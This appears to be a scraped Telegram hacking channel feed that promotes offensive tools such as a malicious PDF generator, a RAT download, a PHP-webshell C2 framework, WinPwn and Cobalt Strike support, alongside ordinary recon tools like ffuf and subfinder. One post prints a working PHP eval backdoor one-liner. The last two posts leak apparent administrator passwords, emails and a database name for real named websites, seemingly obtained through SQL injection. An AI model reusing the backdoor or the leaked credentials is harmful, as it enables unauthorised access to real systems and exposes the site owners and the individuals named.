BugCod3
7.26K subscribers
334 photos
6 videos
7 files
443 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
Malicious PDF Generator ☠️

Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh

Usage

β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$
python3 malicious-pdf.py burp-collaborator-url

Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.

Purpose

βšͺ️ Test web pages/services accepting PDF-files
βšͺ️ Test security products
βšͺ️ Test PDF readers
βšͺ️ Test PDF converters

GitHub

#RedTeam #PDF #Pentesting
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ”₯4
VIPER

βšͺ️ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
βšͺ️ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
βšͺ️ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
βšͺ️ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
βšͺ️ Viper supports running native msfconsole in browser and multi - person collaboration

Site
Installation manual
GitHub

#RedTeam #Viper #Post_Exploitation
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
❀1🫑1
WinPwn

To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on well-known large other offensive security Powershell projects.

GitHub

#RedTeam #PowerShell #Pentesting
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ”₯1
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Features

Efficient:
More than 20 plugins to automate privilege-escalation tasks

Stealth: The framework is made by paranoids, for paranoids

Convenient: A robust interface with many crucial features

Supported platforms (as attacker):

GNU/Linux
Mac OS X

Supported platforms (as target):

GNU/Linux
BSD-like
Mac OS X
Windows NT

GitHub

#RedTeam #Web_Hacking #HackTool
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
🀯1
Grabber Zone-H

Download

#Grabber #ZoneH
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
🀯1
Snoop Project

Snoop Project One of the most promising OSINT tools to search for nicknames

This is the most powerful software taking into account the CIS location.

Is your life slideshow? Ask Snoop.
Snoop project is developed without taking into account the opinions of the NSA and their friends,
that is, it is available to the average user

GNU/Linux βœ…
Windows 7/10 (32/64) βœ…
Android (Termux) βœ…
macOS ❗️
IOS 🚫
WSL 🚫


GitHub
Download

#RedTeam #Scanner #Osint #Username_Search
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
❀1πŸ‘1πŸ”₯1😒1
CobaltStrike support

Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module

GitHub

#RedTeam #Cobalt_Strike #Cross_Platform
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑2❀1
This media is not supported in your browser
VIEW IN TELEGRAM
pwndrop

pwndrop is a self-deployable file hosting service for sending out red teaming payloads or securely sharing your private files over HTTP and WebDAV.

If you've ever needed to quickly set up an nginx/apache web server to host your files and you were never happy with the limitations of python -m SimpleHTTPServer, pwndrop is definitely for you!

GitHub

#RedTeam #Self_Hosted #file_sharing
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑1πŸ‘1
888 Rat

Download

#Rat #Windows #Android
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
😒1
Awesome-Bugbounty-Writeups

A list of writeups in the field of Bug Bunty

GitHub

#Writeup
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ‘2⚑1
Penetration-Testing-Tools

A collection of my Penetration Testing Tools, Scripts, Cheatsheets

This is a collection of more than a 160+ tools, scripts, cheatsheets and other loots that I've been developing over years for Penetration Testing and IT Security audits purposes. Most of them came handy at least once during my real-world engagements.

Notice: In order to clone this repository properly - use
--recurse-submodules
switch:
git clone --recurse https://github.com/mgeeky/Penetration-Testing-Tools.git

GitHub

#RedTeam #Pentesting #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑1
ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.

Installation
Download a prebuilt binary from releases page, unpack and run!

or

If you are on macOS with homebrew, ffuf can be installed with:
brew install ffuf

or

If you have recent go compiler installed:
go install github.com/ffuf/ffuf/v2@latest
(the same command works for updating)

or

git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build

Ffuf depends on Go 1.16 or greater.

GitHub

#Web #InfoSec #Fuzzer
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑2
Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities.

Installation
You can download commix on any platform by cloning the official Git repository :
$ git clone https://github.com/commixproject/commix.git commix

Alternatively, you can download the latest tarball or zipball.

Note: Python (version 2.6, 2.7 or 3.x) is required for running commix.

Usage
To get a list of all options and switches use:
$ python commix.py -h

To get an overview of commix available options, switches and/or basic ideas on how to use commix, check usage, usage examples and filters bypasses wiki pages.

GitHub

#RedTeam #BugBounty #Command_Injection #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑1
Dork Scraper
Scrape website URLs using Google Dorks.

GitHub

#RedTeam #Dork #Scraper #Google
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ‘3
Gobuster

Gobuster is a tool used to brute-force:

βšͺ️ URIs (directories and files) in web sites.
βšͺ️ DNS subdomains (with wildcard support).
βšͺ️ Virtual Host names on target web servers.
βšͺ️ Open Amazon S3 buckets
βšͺ️ Open Google Cloud buckets
βšͺ️ TFTP servers

GitHub

⬇️ Download
πŸ”’ BugCod3

#Go #Dns #Web #Pentesting #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ‘3
Subfinder

subfinder is a subdomain discovery tool that returns valid subdomains for websites, using passive online sources. It has a simple, modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well.

We have made it to comply with all the used passive source licenses and usage restrictions. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike.


βšͺ️ Fast and powerful resolution and wildcard elimination modules
βšͺ️ Curated passive sources to maximize results
βšͺ️ Multiple output formats supported (JSON, file, stdout)
βšͺ️ Optimized for speed and lightweight on resources
βšͺ️ STDIN/OUT support enables easy integration into workflows

GitHub

#Osint #BugBounty #SubDomains
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
httpx
is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. It is designed to maintain result reliability with an increased number of threads.


βšͺ️ Simple and modular code base making it easy to contribute.
βšͺ️ Fast And fully configurable flags to probe multiple elements.
βšͺ️ Supports multiple HTTP based probings.
βšͺ️ Smart auto fallback from https to http as default.
βšͺ️ Supports hosts, URLs and CIDR as input.
βšͺ️ Handles edge cases doing retries, backoffs etc for handling WAFs.

GitHUb

#osint #ssl_certificate #bugbounty #cybersecurity
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple.

FinalRecon provides detailed information such as :

βšͺ️ Header Information

βšͺ️ Whois

βšͺ️ SSL Certificate Information

βšͺ️ Crawler
...

βšͺ️ DNS Enumeration
...

βšͺ️ Subdomain Enumeration
...

βšͺ️ Directory Searching
...

βšͺ️ Wayback Machine
...

βšͺ️ Port Scan
...

βšͺ️ Export
...

Github

#pentesting #web #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑3
🌐 https://www.ntbcl.com

πŸ‘€ name: Admin
πŸ“§ email: ntbcl_adminn@ntbcl.com
πŸ”“ password: NewP30MAY@$#

🚫 login page: N/A

#web #sql
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
🌐 aeronsindia.com

πŸ‘€ Name: Admin
πŸ“§ Email: admin@aeronsindia.com
πŸ”“ Password: admin12345


πŸ“§ Email: anilverm404@gmail.com
πŸ”“ Password: 123

πŸ†š Version: 5.6.51
πŸ—‚ Database: aeronsin_web

🚫 login page: N/A

#web #sql
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3